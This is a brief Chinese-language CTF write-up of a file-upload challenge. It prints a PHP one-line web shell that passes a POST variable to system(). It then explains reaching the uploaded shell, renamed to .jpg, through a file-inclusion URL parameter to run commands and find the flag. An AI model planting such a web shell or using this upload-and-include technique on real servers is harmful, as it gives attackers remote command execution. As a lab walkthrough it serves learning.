知识点
一句话
审题
就不审了 就是个上传
解题
一句话木马肯定很多人都知道 但是肯定有一部分人还停留在只会把马传上去然后菜刀连接的阶段(暗示自己 回到题目 题目没有设置上传后缀的限制 但是上传之后任意后缀形式都会被改成.jpg格式 也就是说 如果只是单纯的上传了马 那么被以jpg格式储存之后 用菜刀是连不上的
下面稍微讲一下这个一句话
<?php @eval(system($_POST["x"]));?>
当这条语句被服务端执行了,我们同时利用 POST 请求上传变量 x 的值,例如 x=echo 'Hello'
php 解析器执行的实质上是 @eval("echo 'Hello'"),即在前端输出一个字符串
更常见的利用手法是利用 @eval(system($_POST["x"])) 直接控制服务端的 shell
我们上传之后 不能直接访问xxx/uploads/xxxxx.jpg 那样只是预览这个文件 而起不到调用这个文件的作用 当然我记得如果是个php后缀的马好像就直接预览就行了
http://331c5aef-7929-44fa-b2c1-cef10026df1e.node3.buuoj.cn/?file=uploads/5fc7887283d67.jpg
这样之后 打开postman慢慢找就可以了
最后找到flag
EOF